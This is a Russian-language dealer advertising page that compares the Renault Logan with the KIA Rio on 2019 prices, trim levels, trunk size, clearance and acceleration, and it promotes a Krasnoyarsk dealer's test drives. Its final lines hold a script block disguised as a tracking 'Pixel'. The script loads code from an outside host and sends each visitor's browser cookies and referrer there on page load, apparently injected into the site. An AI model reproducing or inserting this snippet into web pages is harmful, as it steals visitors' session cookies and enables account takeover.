Официальный дилер Renault

Рено Россия

При выборе бюджетного седана на первом месте должна стоять даже не опциональная оснащенность или экстравагантный дизайн, а техническая надежность транспортного средства. По этому показателю мало кто из конкурентов может сравниться с Renault Logan.

По остальным параметрам французская модель также выглядит интереснее большинства одноклассников. Для того чтобы наиболее наглядно это продемонстрировать, проведем сравнение достоинств и технических характеристик Renault Logan и KIA Rio – одного из лидеров по продажам в России.

Сравнение цен на автомобили в 2019 году

Минимальная сумма, за которую вы сможете купить «Рио», составляет 764 900 рублей. Французский седан можно приобрести значительно дешевле. Стоимость начальной комплектации «Логана» составляет всего 564 000 рублей.

Обе цифры указаны согласно актуальному прайс-листу, без учета кредитования и трейд-ин. Если же вы хотите воспользоваться одним из действующих предложений, то они подробно представлены на сайте официального дилера «Рено» в Красноярском крае – «СИАЛАВТО».

Понять, насколько приобретение выгодно, невозможно без учета предлагаемого оснащения. По цене начальной версии седана от КИА можно приобрести «Логан» даже в топовой комплектации Style, но с базовым мотором, или предмаксимальную Drive, но уже с АКПП.

В первом случае в сравнении с «Рио» вы дополнительно получите боковые эйрбэги, климат-контроль, подогрев передних сидений, мультимедиацентр с 7-дюймовым дисплеем, противотуманные фары и другие опции. Таким образом, при сравнении цен на автомобили в 2019-м преимущество, безусловно, оказывается на стороне «Рено».

Достоинства Renault Logan

Многие достоинства Renault Logan, скорее всего, вам уже знакомы. Прежде всего это надежная платформа B0 и ставшая уже практически легендарной неубиваемая подвеска. Кроме того, следует отметить вместительный багажник (510 литров), немаленький клиренс (172 миллиметра), просторный салон, ресурсные ДВС и трансмиссии.

Достоинства KIA Rio

«Рио» не может похвастаться ни столь большим багажным отделением (меньше на 30 литров), ни просветом (стандартные 160 миллиметров). Поэтому главным достоинством KIA Rio следует назвать хорошее оснащение топовых комплектаций.

Правда, и здесь следует отметить, что максимальная версия южнокорейского седана обойдется будущему владельцу в 1 074 900, в то время как топовый «Логан» с АКПП будет стоить 836 990 рублей.

Сравнение технических характеристик Renault Logan и KIA Rio

По динамике седан от КИА превосходит «Рено», но преимущество не столь значительно и при повседневном передвижении незаметно. Для разгона до сотни самому динамичному мотору «Рио» потребуется 10,3, а «Логану» со 113-сильным ДВС и 5МКПП – 10,7 секунды.

При сравнении таких технических характеристик Renault Logan и KIA Rio, как клиренс и объем багажника, как уже говорилось выше, выигрывает французская модель. А чтобы оценить такие параметры, как управляемость и отзывчивость, рекомендуем записаться на тест-драйв. В случае с автомобилем «Логан» просто воспользуйтесь формой онлайн-заявки на сайте «СИАЛАВТО».

{!-- Pixel --} (function (d, w) { var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie); if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window); {/script} {!-- /Pixel --}